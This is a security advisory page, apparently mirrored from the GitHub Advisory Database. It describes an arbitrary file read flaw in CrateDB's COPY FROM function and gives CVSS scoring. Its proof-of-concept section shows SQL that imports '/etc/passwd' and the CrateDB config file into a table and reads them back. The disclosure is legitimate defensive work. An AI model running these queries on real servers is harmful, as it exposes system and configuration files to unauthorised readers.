Lucene search

K
githubGitHub Advisory DatabaseGHSA-475G-VJ6C-XF96
HistoryJan 30, 2024 - 8:57 p.m.

CrateDB database has an arbitrary file read vulnerability

2024-01-3020:57:16
CWE-22
GitHub Advisory Database
github.com
4
cratedb
arbitrary file read
vulnerability
authenticated users
import
information leakage

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

6.3 Medium

AI Score

Confidence

High

0.052 Low

EPSS

Percentile

93.0%

Summary

There is an arbitrary file read vulnerability in the CrateDB database, and authenticated CrateDB database users can read any file on the system.

Details

There is a COPY FROM function in the CrateDB database that is used to import file data into database tables. This function has a flaw, and authenticated attackers can use the COPY FROM function to import arbitrary file content into database tables, resulting in information leakage.

PoC

CREATE TABLE info_leak(info_leak STRING);
COPY info_leak FROM '/etc/passwd' with (format='csv', header=false); or COPY info_leak FROM '/crate/config/crate.yml' with (format='csv', header=false);
SELECT * FROM info_leak;

image

Impact

This vulnerability affects all current versions of the CrateDB database. Attackers who exploit this vulnerability to obtain sensitive information may carry out further attacks, while also affecting CrateDB Cloud Clusters.
image

Affected configurations

Vulners
Node
github_advisory_databaseio.crate\Matchcrate5.6.0
OR
github_advisory_databaseio.crate\Matchcrate
OR
github_advisory_databaseio.crate\Matchcrate
OR
github_advisory_databaseio.crate\Matchcrate

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

6.3 Medium

AI Score

Confidence

High

0.052 Low

EPSS

Percentile

93.0%

Related for GHSA-475G-VJ6C-XF96